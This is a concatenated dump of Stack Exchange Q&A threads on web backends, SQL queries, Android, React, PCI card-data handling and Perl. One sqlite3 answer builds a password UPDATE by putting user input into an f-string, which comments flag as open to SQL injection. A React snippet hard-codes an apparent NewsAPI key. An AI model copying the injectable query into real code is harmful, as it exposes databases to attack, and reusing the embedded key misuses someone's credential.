'ok'\n<\/code>\nEach <code>main_process<\/code> task downloads an image from a bucket in S3 and then does some processing. The solution shown above works ok until it reaches like 10 images processed asynchronously (given async def) and then it crashes. \nI've tried increasing some gunicorn parameters as well, like <code>max-requests<\/code> to 100, like this:\n<code>gunicorn api:app -b 0.0.0.0:8000 -w 4 -k uvicorn.workers.UvicornWorker --preload --max-requests 100 --daemon\n<\/code>\nWhich gave me more room to process (20 more images), but it crashes anyway.\nI've also considered using Celery or some distributed task queue solution, but I want to keep things as simple as possible.\nSince async behaviour is not crucial, but instant response is, is it possible to switch to a synchronous solution but having an \"ok\" response right away? \nAnswer: No, you'll have to really dispatch the task and delegate it to some processing backend. Such backend can be quite simple, e.g. just a task queue (celery\/amqp, redis, a relational database, whatever suits your needs) and at least one process consuming that queue, performing the calculation and feeding the result back into the storage.\nWhen you dispatch the request from your API, generate a UUID at the same time and store it alongside your calculation job in the queue. When you feed back your quick 200 OK to the caller, also provide them their job's UUID (if required). They'll hit your API again querying for a result; have them provide the UUID and use it to look for a result in your storage backend.\nTo avoid calculating the same request twice, generate a hash from the request and use that instead of the UUID (watch for collision, you want some longer hashes). That works easily as long as you don't have to cope with user\/image permissions.\nComment: Thanks jbndlr. I agree. In the end this service is suposed to work asynchronously, so I ended up using a simple task queue and a good combination of async \/ await in my code.\n","meta":{"source":"stackoverflow","title":"Need to send response status code right away with FastAPI while keeping jobs synchronously in the background","dup_signals":{}},"subset":"stackexchange"} +{"text":"Is it possible to construct a PRNG where the output numbers have a certain distribution of hamming weights?\n\nQuestion: I am in need of a non-uniform random number generator where each n-bit output has a hamming weight with a certain binomial distribution.\nFor example, I would like a non-uniform PRNG which generates 32-bit outputs with a hamming weight whose binomial distribution is n=32, p=0.1. For instance, 0xFF should be output with significantly less probability than 0x200, which in turn should have the same probability as 0x1. \nPerhaps I can modify the output of a PRNG like xorshift or a LFSR to accomodate for this? I thought about rejection sampling the output, but the distribution of hamming weights for a uniform PRNG does not necessarily envelope a given binominal distribution with a variable parameter p, especially when p << 0.5.\nI am not concerned about the cryptographic quality of the output. However, I am working on a 8 bit microcontroller with 2 KB SRAM, so memory and speed are both my primary concern. In the most naive case, I would just generate an array of random numbers and convert each element to 0 and 1 given a threshold probability, and finally convert this resulting array of 0's and 1's to an integer. But I would really, really like to avoid this memory overhead of an n-element array. \nComment: You don't need to store an N-element array, you can update your integer bit by bit on the fly. Since order doesn't matter you can just do this: `output = (output << 1) | (1 or 0)`, 32 times or as many times as needed, shifting the bits in as you go.\nAnswer: The obvious way to do this is to generate N words, and use logical operations to combine them in a single word such that each bit of the output word is a 1 with probability approximately 0.1 (and the individual bits are uncorrelated).\nIn the simplest case, you could generate 3 words, and just AND them together into a single one. In C, this would be:\n<code> r1 = rand();\n r2 = rand();\n r3 = rand();\n return r1 & r2 & r3;\n<\/code>\nThis gives each bit set with probability 0.125, which is close to 0.1\nIf that's not quite close enough, you can get a closer approximation by using more bits; for example, <code>r1 & r2 & r3 & ~(r4 & r5)<\/code> results with bits set with probability $3\/32 = 0.09375$\nWith this technique, you use $n$ random words to generate bits set with probability $k 2^{-n}$ for some integer $k$; this can be made arbitrarily close to 0.1.\nThis obviously uses minimal memory; the computation time isn't too bad (assuming your rand implementation is cheap), unless you insist on a quite good approximation to your target probability.\nAnd, while I said 'words', your implementation would use whatever size it finds most convenient; for an 8 bit CPU, each word might be 8 bits (and you just do it 4 times to generate the required 32 bits).\nComment: An approximate probability for each Bernoulli trial is perfectly fine for my application. Interesting technique that can scale in accuracy with the number of words - Thanks!\nComment: @Ollie: you just need to make sure that adjacent calls to the underlying rng don't have strong bit correlations; an LFSR-based rng might, a linear congruential (state = a*state + b mod m for m odd) one would be less likely to cause problems\nComment: Sorry for raising this thread from the dead. Quick question: Is there a name in the academic literature for this technique of using combinations of bitwise-and and bitwise-or to approximate bit probabilities? I can see that for probability $k \\cdot 2^{-n}$ that the binary representation of any general k forms a radix tree (bitwise trie). And that this radix tree can be used to find the correct sequence of and\/or instructions for an arbitrarily large n. This allows unlimited precision in approximating the probability, given enough RAM. I'm wondering if this idea is well known?\nComment: @Ollie: I don't know of a reference to this approach in the published literature\nComment: Worth a shot, thanks anyways!\n","meta":{"source":"crypto.stackexchange","title":"Is it possible to construct a PRNG where the output numbers have a certain distribution of hamming weights?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Can't update a value in sqlite3\n\nQuestion: I have some data in an sqlite3 database, I made an input to be a command to update that data.\nfor some reason when I run that command it does not work and gives me an sqlite3.OperationalError: no such column: \"some lettres\"\nmy function to update the data: (the generate_pwd() function works just fine and it has been tested)\n<code> def update_query(self, wbname):\n \"\"\"this function enables the user to update a query\n\n Args:\n wbname (str): the website name to change the pass\n \"\"\"\n with conn:\n newpwd = go.generate_pwd()\n c.execute(f\"UPDATE password_list SET password={newpwd} WHERE website_name={wbname}\")\n pass\n<\/code>\nmy elif statement to make the command:\n<code>elif command == \"u\":\n wbname = input(\"Enter the site name: \")\n co.update_query(wbname)\n<\/code>\n\nI hope it is clear enough, If you need any further data on my problem just type in the comments.\nAnswer: You can't use f-strings with SQL.\nUse parametrized queries as explained in the docs instead:\n<code>c.execute(f\"UPDATE password_list SET password=? WHERE website_name=?\", (newpwd, wbname))\n<\/code>\nComment: Waiting for the seven minutes to pass so I can confirm your answer\nComment: JFTR, \"You can't use f-strings with SQL\" is not quite right. You can do it. But \"THOU SHALT NOT FORMAT PARAMETERS YOURSELVES\" is true of course.\nAnswer: You need to wrap string values in the query within single quotes, otherwise they will be interpreted as column objects:\n<code>c.execute(f\"UPDATE password_list SET password='{newpwd}' WHERE website_name='{wbname}'\")\n<\/code>\nYou might want to use a parameterized query instead of building a query string. That way your query is less vulnerable to SQL injections.\nAs parameters you can pass an interable object, e.g. a tuple or a list.\n<code>c.execute(\"UPDATE password_list SET password=? WHERE website_name=?\", [newpwd, wbname])\n<\/code>\nYou could also use named-style parameters:\n<code>c.execute(\"UPDATE password_list SET password=:pw WHERE website_name=:wbname\", {\"pw\": newpwd, \"wbname\": wbname})\n<\/code>\nAnother advantage of using parameterized queries is that you do not have to worry about wrapping strings in single quotes.\nComment: Never do this with SQL; it will be vulnerable to SQL injection attacks.\nComment: Obviously the input isn't sanizized and there is no reason to use something other than a parameterized version of the SQL statement here. Of course it's good to explain what was wrong, but the solution should show how it's done. Yes, I can show someone how to use a hammer to put a screw in a screw anchor, but it would be better if I teach them how to use a screwdriver.\nComment: Not if you sanitize your inputs. This is nonethelesse a valid answer and it explains why OP gets the ``no such column`` exception. While \"You can't use f-strings with SQL.\" is wrong. The f-string is evaluated before it's passed to the sql engine.\nComment: @MikeScotty Sanitization is not the right approach, correct quoting would be. But you can't generally know better how to quote a string than the SQL engine itself can.\n","meta":{"source":"stackoverflow","title":"Can't update a value in sqlite3","dup_signals":{}},"subset":"stackexchange"} +{"text":"SQL Server : complicated query\n\nQuestion: I have two tables <code>document<\/code> and <code>documentd<\/code>; the first one contains the numbers of the invoices <code>doc_num<\/code> as primary key, document types <code>doc_type<\/code> (FACA, BLCO, BLCM, BLCK .....) and the document date <code>doc_date<\/code>.\nEach invoice has one <code>DOC_TYPE<\/code> and one date, and each date my be contained in one or more invoices.\nTable <code>DOCUMENT<\/code>:\n\nDOC_NUM\nDOC_TYPE\nDOC_DATE\n\nINVOICE1901221\nFACA\n22\/01\/2019\n\nINVOICE1902221\nFACA\n22\/02\/2019\n\nINVOICE1902222\nFACA\n22\/02\/2019\n\nINVOICE1903221\nFACA\n22\/03\/2019\n\nBLCO190122001\nBLCO\n22\/01\/2019\n\nBLCO190123001\nBLCO\n23\/01\/2019\n\nBLCM190122001\nBLCM\n22\/01\/2019\n\nINVOICE1901021\nFACA\n02\/01\/2019\n\nINVOICE1903011\nFACA\n01\/03\/2019\n\nINVOICE1904221\nFACA\n22\/04\/2019\n\nINVOICE1904222\nFACA\n22\/04\/2019\n\nThe second table is the details of each invoices he contains as foreign key <code>doc_num<\/code> the code of products for each invoice <code>art_code<\/code> and finally the prices of the products <code>art_price<\/code>.\nTable <code>DOCUMENTD<\/code>:\n\nDOC_NUM\nART_CODE\nART_PRICE\n\nINVOICE1901221\nPRODUCT1\n1000\n\nINVOICE1901221\nPRODUCT2\n2000\n\nINVOICE1902221\nPRODUCT3\n950\n\nINVOICE1902221\nPRODUCT4\n980\n\nINVOICE1904221\nPRODUCT1\n1200\n\nINVOICE1903011\nPRODUCT2\n900\n\nBLCO190122001\nARTICLE1\n900\n\nBLCO190123001\nARTICLE2\n800\n\n[DOCUMENTD TABLE][2]\nMy goal in first step is to join the two tables using <code>doc_num<\/code> selects all <code>FACA<\/code> type invoices and their products except the prices they must be THE LAST UPDATED PRICE IN FACA TYPE.\nRESULT:\n\nINVOICE1904221\nPRODUCT1\n1200\n22\/04\/2019\n\nINVOICE1903011\nPRODUCT2\n900\n01\/03\/2019\n\nINVOICE1902221\nPRODUCT3\n950\n22\/02\/2019\n\nINVOICE1902221\nPRODUCT4\n980\n22\/02\/2019\n\nThe second step I have another table how contain <code>ORDER<\/code> and <code>ART_CODE<\/code>:\n\nORDER\nART_CODE\n\n1\nPRODUCT1\n\n2\nPRODUCT2\n\n3\nPRODUCT3\n\nI want to fetch the first result depend on this table:\n\nINVOICE1904221\nPRODUCT1\n1200\n22\/04\/2019\n\nINVOICE1903011\nPRODUCT2\n900\n01\/03\/2019\n\nINVOICE1902221\nPRODUCT3\n950\n22\/02\/2019\n\nI try this but he fetch same product with different prices\n<code>SELECT \n d1.DOC_NUM, dd1.ART_CODE, dd2.ART_PRICE, d2.DOC_DATE \nFROM\n document d1 \nINNER JOIN \n documentd dd1 ON dd1.DOC_NUM = d1.DOC_NUM\nINNER JOIN \n documentd dd2 ON dd2.ART_CODE = dd1.ART_CODE\nINNER JOIN \n document d2 ON d2.DOC_NUM = dd2.DOC_NUM \n AND d2.DOC_TYPE <> d1.DOC_TYPE\nWHERE \n d1.DOC_TYPE = 'FACA'\n<\/code>\nComment: I do not understand `...except the prices they must be THE LAST UPDATED PRICE IN FACA TYPE`. What do you mean by that? Furthermore I do not understand the sense of that one: `The second step I have another table how contain ORDER and ART_CODE`, what means that? What is this table for? You are not joining it.\nComment: I want to select from the **DOCUMENTD** table the products with the last price depend on the newest date from **DOCUMENT** table and with **DOC_TYPE** FACA and show only the products who existed in the last table\nAnswer: @MOHAMED NEJI it's really hard to understand what you meant. Please try to be more clear on your questions.\nThe proposed solution below shows how to get the results you asked in both RESULTS tables with the input data that you gave.\n<code>CREATE TABLE #DOCUMENT (\n DOC_NUM VARCHAR(30)\n , DOC_TYPE CHAR(4)\n , DOC_DATE DATE)\nCREATE TABLE #DOCUMENTD (\n DOC_NUM VARCHAR(30)\n , ART_CODE VARCHAR(20)\n , ART_PRICE DECIMAL(10,4))\nCREATE TABLE #OTHERTABLE(\n [ORDER] int \n , ART_CODE VARCHAR(20)\n)\n\nINSERT INTO #DOCUMENT\n SELECT 'INVOICE1901221' DOC_NUM, 'FACA' DOC_TYPE, '2019-01-22' DOC_DATE\nUNION ALL SELECT 'INVOICE1902221' DOC_NUM, 'FACA' DOC_TYPE, '2019-02-22' DOC_DATE\nUNION ALL SELECT 'INVOICE1902222' DOC_NUM, 'FACA' DOC_TYPE, '2019-02-22' DOC_DATE\nUNION ALL SELECT 'INVOICE1903221' DOC_NUM, 'FACA' DOC_TYPE, '2019-03-22' DOC_DATE\nUNION ALL SELECT 'BLCO190122001' DOC_NUM, 'BLCO' DOC_TYPE, '2019-01-22' DOC_DATE\nUNION ALL SELECT 'BLCO190123001' DOC_NUM, 'BLCO' DOC_TYPE, '2019-01-23' DOC_DATE\nUNION ALL SELECT 'BLCM190122001' DOC_NUM, 'BLCM' DOC_TYPE, '2019-01-22' DOC_DATE\nUNION ALL SELECT 'INVOICE1901021' DOC_NUM, 'FACA' DOC_TYPE, '2019-01-02' DOC_DATE\nUNION ALL SELECT 'INVOICE1903011' DOC_NUM, 'FACA' DOC_TYPE, '2019-03-01' DOC_DATE\nUNION ALL SELECT 'INVOICE1904221' DOC_NUM, 'FACA' DOC_TYPE, '2019-04-22' DOC_DATE\nUNION ALL SELECT 'INVOICE1904222' DOC_NUM, 'FACA' DOC_TYPE, '2019-04-22' DOC_DATE\n\nINSERT INTO #DOCUMENTD\n SELECT 'INVOICE1901221' DOC_NUM, 'PRODUCT1' ART_CODE, 1000 ATR_PRICE\nUNION ALL SELECT 'INVOICE1901221' DOC_NUM, 'PRODUCT2' ART_CODE, 2000 ATR_PRICE\nUNION ALL SELECT 'INVOICE1902221' DOC_NUM, 'PRODUCT3' ART_CODE, 950 ATR_PRICE\nUNION ALL SELECT 'INVOICE1902221' DOC_NUM, 'PRODUCT4' ART_CODE, 980 ATR_PRICE\nUNION ALL SELECT 'INVOICE1904221' DOC_NUM, 'PRODUCT1' ART_CODE, 1200 ATR_PRICE\nUNION ALL SELECT 'INVOICE1903011' DOC_NUM, 'PRODUCT2' ART_CODE, 900 ATR_PRICE\nUNION ALL SELECT 'BLCO190122001' DOC_NUM, 'ARTICLE1' ART_CODE, 900 ATR_PRICE\nUNION ALL SELECT 'BLCO190123001' DOC_NUM, 'ARTICLE2' ART_CODE, 800 ATR_PRICE\n\nINSERT INTO #OTHERTABLE\n SELECT 1 [ORDER], 'PRODUCT1' ART_CODE\nUNION ALL SELECT 2 [ORDER], 'PRODUCT2' ART_CODE\nUNION ALL SELECT 3 [ORDER], 'PRODUCT3' ART_CODE\n\n;WITH Docs AS (\n SELECT dd.DOC_NUM, dd.ART_CODE, dd.ART_PRICE, d.DOC_DATE ,ROW_NUMBER() OVER (PARTITION BY art_code ORDER BY DOC_DATE DESC ) rn\n FROM #DOCUMENTD dd\n INNER JOIN #DOCUMENT d \n ON d.DOC_NUM = dd.DOC_NUM\n WHERE DOC_TYPE = 'FACA'\n)\nSELECT DOC_NUM, ART_CODE, ART_PRICE, DOC_DATE \nFROM Docs\nWHERE rn = 1\n\n;WITH Docs AS (\n SELECT dd.DOC_NUM, dd.ART_CODE, dd.ART_PRICE, d.DOC_DATE ,ROW_NUMBER() OVER (PARTITION BY art_code ORDER BY DOC_DATE DESC ) rn\n FROM #DOCUMENTD dd\n INNER JOIN #DOCUMENT d \n ON d.DOC_NUM = dd.DOC_NUM\n WHERE DOC_TYPE = 'FACA'\n)\nSELECT DOC_NUM, Docs.ART_CODE, ART_PRICE, DOC_DATE \nFROM Docs\nINNER JOIN #OTHERTABLE ot\n ON ot.ART_CODE = Docs.ART_CODE\nWHERE rn = 1\n<\/code>\n","meta":{"source":"stackoverflow","title":"SQL Server : complicated query","dup_signals":{}},"subset":"stackexchange"} +{"text":"Placing QR code scanner in a Fragment\n\nQuestion: I am using an android QR code processing library - android QR code.\n I am extending the DecoderActivity for scanner and now I want the scanner to be inside a fragment, I have used <code>LocalActivityManager<\/code> to embed Activity inside a fragment. Here is the code:\n<code>public class QrCodeProcessorFragment extends SherlockFragment {\n\nprivate static final String KEY_STATE_BUNDLE = \"localActivityManagerState\";\n\nprivate LocalActivityManager mLocalActivityManager;\n\nButton generate_qr_code;\n\nprivate QuickPayManagerActivity parent;\n\nprotected LocalActivityManager getLocalActivityManager() {\n return mLocalActivityManager;\n}\n\n@Override\npublic void onCreate(Bundle savedInstanceState) {\n super.onCreate(savedInstanceState);\n\n Bundle state = null;\n if (savedInstanceState != null) {\n state = savedInstanceState.getBundle(KEY_STATE_BUNDLE);\n }\n\n mLocalActivityManager = new LocalActivityManager(getActivity(), true);\n mLocalActivityManager.dispatchCreate(state);\n}\n\npublic View onCreateView(LayoutInflater inflater, ViewGroup container,\n Bundle savedInstanceState) {\n \/\/ This is where you specify you activity class\n Intent i = new Intent(getSherlockActivity(), CaptureActivity.class);\n Window w = mLocalActivityManager.startActivity(\"tag\", i);\n View currentView = w.getDecorView();\n ViewGroup vg = (ViewGroup) (currentView.getParent());\n if (vg != null)\n vg.removeView(currentView);\n\n currentView.setVisibility(View.VISIBLE);\n currentView.setFocusableInTouchMode(true);\n ((ViewGroup) currentView)\n .setDescendantFocusability(ViewGroup.FOCUS_AFTER_DESCENDANTS);\n\n return currentView;\n}\n\n@Override\npublic void onSaveInstanceState(Bundle outState) {\n super.onSaveInstanceState(outState);\n outState.putBundle(KEY_STATE_BUNDLE,\n mLocalActivityManager.saveInstanceState());\n}\n\n@Override\npublic void onResume() {\n System.out.println(\"lam onresume\");\n super.onResume();\n mLocalActivityManager.dispatchResume();\n}\n\n@Override\npublic void onPause() {\n System.out.println(\"lam onpause\");\n super.onPause();\n mLocalActivityManager.dispatchPause(getActivity().isFinishing());\n}\n\n@Override\npublic void onStop() {\n super.onStop();\n mLocalActivityManager.dispatchStop();\n}\n\n@Override\npublic void onDestroy() {\n super.onDestroy();\n mLocalActivityManager.dispatchDestroy(getActivity().isFinishing());\n}}\n<\/code>\nQR scanner is not working now. I debugged the library code, it is expecting an activity instance and I am passing the activity instance which is inside the fragment. Hope I am clear on this. Please help!\nAnswer: I found a library called Barcode Fragment library which uses a fragment for hosting the scanner functionality. Works fine but hasn't supported portrait mode support, I have done changes to library as suggested in here. It worked like a charm :)\nComment: Can you please share the code for that ? the second link on your answer does not seems to be working anymore.\n","meta":{"source":"stackoverflow","title":"Placing QR code scanner in a Fragment","dup_signals":{}},"subset":"stackexchange"} +{"text":"Why I am getting these error during fetch api?\n\nQuestion: I was trying to fetch the news API but I keep on getting this error\n<code>TypeError: Cannot read properties of undefined (reading 'map')<\/code> is there any syntax or do I need to add something?\nPlease help me with this.\n<code> import React, { Component } from 'react'\n import NewsItem from '.\/NewsItem'\n export default class News extends Component {\n constructor(){\n super();\n this.state={\n article : this.article\n }\n }\n \n async componentDidMount(){\n let urll = \"https:\/\/newsapi.org\/v2\/top-headlines? \n country=in&apiKey=6aeca0faebbd45c1a1ec3c463f703ebb\";\n let data = await fetch(urll); \n console.log(data)\n let parseData = await data.json() ; \n console.log(parseData);\n this.setState({article : parseData.articles});\n }\n \n render() {\n return (\n <div className='newcontainer my-5'>\n <h1 className='mainheading' >PAHADI PRESS BREAKING NEWS<\/h1>\n {this.state.article.map((e)=>{\n return <div key={e.url} >\n <NewsItem title={e.title} decription={e.description} imageUrl={e.urlToImage} \n newsUrl={e.url}\n newsauthor={e.author}\/>\n <\/div>\n })\n }\n <\/div>\n )\n }\n }\n<\/code>\nYou can see in this image of the console what error I am getting->>\n[1]: https:\/\/i.stack.imgur.com\/eOWkx.png\nComment: The error is indicating that whatever you're calling `map()` on is `undefined`. So it looks like the `this.state.article` property is `undefined` by the time it is rendered. Make sure that you're initializing it as an array as expected every where you change your state.\nComment: Yes you are right when I am adding the api data manually in the file then everything seems fine, can you tell me how to make sure that it remains an arrray, or what I need to change in the code?\nComment: @Ankit Can you show in the post what shows your `console.log()` ?\nComment: David though the problem is solved but I will still show you the console if you are interested, moreover the console.log() didnt show anything after some time initiallt it was showing the arry. I have added the image in the question.\nAnswer: Your <code>article<\/code> state is not initialized. Make sure that you do that before the component renders.\nInstead, you can use the optional chaining <code>?.<\/code> operator when calling the <code>map<\/code> method to not cause an error if <code>this.state.article<\/code> is nullish (<code>null<\/code> or <code>undefined<\/code>).\nExample: <code>this.state.article?.map(...)<\/code>\nComment: I did this \" this.state?.article.map(...) \" but the error is still there, how really I have to initilize the article. I want to make sure that it works everytime and I dont need to check if that is array or not\nComment: Sorry, it is `this.state.article?.map(...)`. I have updated my answer, check it again.\nComment: Put `?.` before calling the `map` method since `article` is `undefined` at component mount.\nComment: Using `?.` operator in this case will just return `undefined` instead of causing an error for calling a method on an `undefined` value.\nComment: Thank You I have initilized the article and the problem is gone.\nAnswer: As pointed out in Tarek's answer, the <code>article<\/code> state is not initialized. The problem arises from the constructor, where you assign <code>{article: this.article}<\/code> to the state.\nIn the constructor, the instance is not yet accessible, it is indeed being constructed, which means that <code>this.article<\/code> does not exist yet, thus assigning <code>undefined<\/code> to the state.\nYou can instead assign it a default value, like an empty array: <code>this.state = {article: []}<\/code>. This should fix your problem.\n<code>componentDidMount<\/code> is called after <code>render<\/code>, but you populate the state in <code>componentDidMount<\/code> and try to access it in <code>render<\/code>. <code>this.state.article<\/code> will thus always be <code>undefined<\/code> for a short period of time, causing the error you mentioned.\nComment: Thank you very much the problem is gone and thank you for this information.\n","meta":{"source":"stackoverflow","title":"Why I am getting these error during fetch api?","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to submit credit card info to a separate server\/website (PCI)\n\nQuestion: My company has a website\/service that stores\/processes credit cards and is PCI compliant (Site A). We also have websites with storefronts that need to submit credit card data to that site for processing (Site B). When someone orders something on Site B, and enters their billing information, how do I submit that information to Site A and remain PCI compliant?\nObviously they're on a secure page on Site B, when they are entering their billing details.\nCan I just post the form to a secure page on Site A from a secure page on Site B? Do I need to encrypt the credit card during this transaction? Obviously it is stored in some sort of encrypted state, but does it need to be encrypted during the submit transaction?\nDo I need to setup some sort of handshake between the websites, like a secret key? If so, what would be a secure way to create that key\/handshake?\nWe've been reading and reading about PCI compliance trying to find concrete answers, but it seems kindof subjective, and obscure what we are supposed to be doing.\nThis question is also currently posted on StackOverflow.\nComment: Perhaps not a repeat of this question -- but my answer here provides valuable PCI Scoping information -- http:\/\/security.stackexchange.com\/questions\/2922\/why-doesnt-the-clients-web-browser-need-to-be-pci-compliant\/2933#2933\nAnswer: The PCI DSS applies to any system which stores, processes or transmits cardholder data. In the scenario you describe above, to the letter of the law, you would need to apply the standard to all systems and networks which make up Site B.\nAs you are not storing cardholder data in Site B this will at least reduce the amount of work you would need to cover as, for example, as far as I can see, the whole of \"Requirement 3 - Protect stored cardholder data\" would be N\/A.\nYou will however need to ensure that things like your firewall\/DMZ architecture is appropriately put together and managed (Requirement 1), that cardholder data is encrypted in transmission if the connection between Site A and Site B is over an \"open, public network\" like the Internet.\nPicking up your point, and to echo @Rook, SSL will be fine for this purpose (see Requirement 4.1). You do not need to hash or encrypt the card data at this point. It is only when it is at rest.\nMoving through the standard, pretty much everything else will apply, Systems should be hardened (Requirement 2), Anti-virus (if it's a system \"commonly affected by viruses\") and patch management (Requirement 5), good Software Development processes (Requirement 6) - not forgetting the legendary 6.6, code review or WAF.\nStrong access controls (Requirements 7 and 8), Physical security (9), Logging and monitoring (10), regular testing (11) and good information security management (12) will all apply as far as I can see.\nWithout any of these elements if I were the attacker I would simply target Site B and grab the data either straight off the server as it's input by the customer or as it transmits out of Site B into Site A.\nThis is actually a common scenario in the payment processing world (think PayPal, WorldPay, etc). \"Merchants\" (someone taking credit card payments) typically have two choices when they wish to integrate with a payment processor to take credit card payments. \n1) They receive the card data themselves, typically through a web form and then POST that data to the payment processor's API for authorisation, etc. This is typically done by the larger merchants. They process the response and update their systems and respond to the customer appropriately.\n2) They \"redirect\" the customer to the payment processor who then takes the card data through a form on their own website so the merchant never sees the card data at all. The merchant is typically then updated as the success of the order by some \"out of band\" HTTP POST to the merchant's website. The customer obviously has an immediate on screen result.\nIn option 1, the merchant would be required to achieve full PCI DSS compliance. In option 2 the merchant does not have a need to comply as they are not storing, processing or transmitting card data.\nIf Site B is not currently in scope of your PCI DSS compliance and you wish to keep it that way, I would suggest you develop a means to take the payment data directly on Site A and Site B just points people that way.\nI hope this was useful. I've got a lot of experience with the PCI DSS so would be happy to discuss further. Standard disclaimer though, I'm not a QSA so any decisions regarding scope should be verified with a Qualified Security Assessor before beginning work.\nComment: Only (nitpicking) comment: `I'm not a QSA` - even if you *were* **a** QSA it wouldn't matter, as you are not *his* QSA, and whomever that is gets to make the calls anyway :D\nComment: Excellent answer, well done. +1.\nComment: Yeh, spot on and fair point. Thanks for feedback and vote. :-)\nComment: Thank you for taking the time to break this down for me. Much appreciated.\nAnswer: In short the PCI-DSS states that credit card information must never be in plain text. That being said you shouldn't whip up your own protocol for this. HTTPS is a great solution.\n","meta":{"source":"security.stackexchange","title":"How to submit credit card info to a separate server\/website (PCI)","dup_signals":{}},"subset":"stackexchange"} +{"text":"Using Perl to move commas from end of line to begining of line\n\nQuestion: I've inherited a few dozen sql scripts that look like this:\n<code>select\n column_a,\n column_b,\n column_c\nfrom\n my_table\n<\/code>\nTo format them so they match the rest of our sql library, I'd like to change them to look like this:\n<code>select\n column_a\n ,column_b\n ,column_c\nfrom\n my_table\n<\/code>\nwhere the commas start at the beginning of the line instead of at the end. I've taken a few passes at this in Perl, but haven't been able to get it to work just right. \nCan any of you Perl gods provide some enlightenment here?\nComment: I would rather correct the rest of the library.\nComment: @Svante: you probably don't like the \"perlish\" coding style either (http:\/\/ysth.info\/pcs.html)\nAnswer: <code>perl -pi.bak -0777 -wle's\/,[^\\n\\S]*\\n([^\\n\\S]*)\/\\n$1,\/g' file1.sql file2.sql ...\n<\/code>\nThe character class is any non-newline whitespace.\n-0777 causes it to operate on whole files, not lines.\n","meta":{"source":"stackoverflow","title":"Using Perl to move commas from end of line to begining of line","dup_signals":{}},"subset":"stackexchange"} +{"text":"how to add player control ui in google IO18 audio App demo\n\nQuestion: What am I trying to do:\nUsing google exoPlayer to play music, foreground and background.\nBreak into details:\n\nThe app launches, google exoPlayer playback control UI should be visible and starts to play immediately.\nAs soon as the player starts to play, we should see the notification (Using exoplayer's <code>PlayerNotificationManager<\/code> )\nUser exits the app either by pressing the back button or swipe from the recent task, the player service should keep running in foreground with notification.\nUser taps the notification, it should bring up the app.\n\nWhat I have done:\nI followed google IO18 on this link\nhttps:\/\/www.youtube.com\/watch?v=svdq1BWl4r8&t=1990s\nWhile I am following the above youtube link, especially the audio app part, I realize one thing, how do you pros add player control UI into this app?\ne.g, the app is onDestory, user quits. Then user taps on the notification, back to the MainActivity, there is nothing there, it's an empty screen, question is, how do you add play control ui in here?\nI have looked into https:\/\/github.com\/googlesamples\/android-UniversalMusicPlayer tyring to figure out this. However, the Universal Android Music Player Sample is using a giant notification (Not PlayerNotificationManager see on IO18) and custom player UI (Not ExoPlayer out of box control UI) which is confusing me a lot.\nPlease, please, please help.\nHow to add player control ui in the following code.\nhttps:\/\/github.com\/bizkitj\/MediaSessionExoPlayer\/tree\/ExoPlayerGoogleIO2018\nIf you can , please not only show me how you do it, I also need to know why did you do it? Break into steps.\nVersion of ExoPlayer being used:\n<code>implementation 'com.google.android.exoplayer:exoplayer-core:2.8.0' \nimplementation 'com.google.android.exoplayer:exoplayer-ui:2.8.0'\nimplementation 'com.google.android.exoplayer:extension-mediasession:2.8.0'\n<\/code>\nPlease be noted, I am tyring to build things upon the googleIO18 demo app. This demo app is using exoPlayer's <code>PlayerNotificationManager<\/code> which is great to keep sync with <code>MediaSession<\/code>, I do not want to change this <code>PlayerNotificationManager<\/code> to android <code>Notification.MediaStyle<\/code>.\nThank you.\nComment: I think this is what you're trying to accomplish https:\/\/stackoverflow.com\/a\/52680590\/9419047\nComment: HI did your problem solved ? I also had the same issue. Please help\nComment: @krishnamn. nope, I wish someone from exoPlayer could answer this, apperently. No. Sad.\nAnswer: Since your question is rather about some best practice of managing UI, I try to explain with some general idea:\n1- You need a background service which plays the audio and returns <code>START_NOT_STICKY<\/code> \n2- It starts forground as soon as your <code>PlayerNotificationManager<\/code> listener calls back with some <code>notificationId<\/code> and <code>notification<\/code> \n3- in your Activity, you bind to the background service which plays the music. this would be better to happen in <code>onStart<\/code> \n4- unbind from the service on <code>onStop<\/code> \nin this way you will have access to the ExoPlayer instance which is working in the background service, you will be able to attach listeners, views, etc. to it as per requirement. Then you will be able to check if there is anything playing to bring up the proper UI\nI wish this is helpful for you. Good luck\nComment: Thank you for the answer and sorry for my very very late response. However, I am looking for a rather detailed step since I am still on the learning path. With your answer, I have to maybe spend hours of searching to 'convert' them into practical code.\n","meta":{"source":"stackoverflow","title":"how to add player control ui in google IO18 audio App demo","dup_signals":{}},"subset":"stackexchange"} +{"text":"Set SQLite data to JsonObject class without using Stringbuilder\n\nQuestion: Am retrieving information from my SQLite database to display on CardView\nMy SQLite database structure is SQLite DB\nMy class is\n<code> public class ServiceRequest{\n public String reqid;\n public String name;\n public String branch;\n public Date date;\n public Date time;\n public String services;\n \/\/Getter and setter\n .............\n .............\n }\n<\/code>\nI can convert this to JSON format using \n<code> List<ServiceRequest> reqs = getAllReqs();\n List<ServiceRequest> jobservList = new ArrayList<>();\n\n for (ServiceRequest access : reqs) {\n ServiceRequest ob = new ServiceRequest();\n\n ob.setId(access.getId());\n ob.setBranch(access.getBranch());\n ob.setName(access.getName());\n ob.setDate(access.getDate());\n ob.setTime(access.getTime());\n ob.setServices(access.getServices());\n jobservList.add(ob);\n }\n\n Gson gson = new GsonBuilder().setPrettyPrinting().create();\n String json2 = gson.toJson(jobservList);\n return json2;\n<\/code>\nbut my desired JSONObject format is\n<code>{ \n \"100\": {\n\n \"name\": \"Rahul Suresh\",\n \"branch\": \"Koramangala\",\n \"phNumber\":\"123456\",\n \"date\": \"2016-08-06\",\n \"time\": \"16:00\",\n \"reqServices\": \"Loans\"\n },\n \"200\": {\n \"name\": \"Sidh\",\n \"branch\": \"Jayanagar\",\n \"phNumber\":\"182694\",\n \"date\": \"2016-08-12\",\n \"time\": \"11:00\",\n \"reqServices\": \"OpenAcc,SafeDeposit\"\n }\n }\n<\/code>\nso that I will get one whole JSON object with a single call\n<code>JSONObject jb = (JSONObject) jsonObject.get(Integer.toString(id));\n<\/code>\n100,200 are 'reqid' s\nIt's possible to achieve this using string builder. But is there any other ways to implement this like using an object mapper along with a class or something..?\nComment: Your class structure is not correct if you want to use an object mapper like Gson or Jackson. The ID would have to be in the inner object, not the key\nComment: @cricket_007 Ya am aware of that...Since I want JSON on the given format am searching a way other than making a string builder.\nComment: It is possible with a Hashmap of integer to your class, then have Gson convert that\nComment: @cricket_007 Can you gimme a small sketch how that class will be?!!\nAnswer: If you would like to form the JSON you have shown, you could 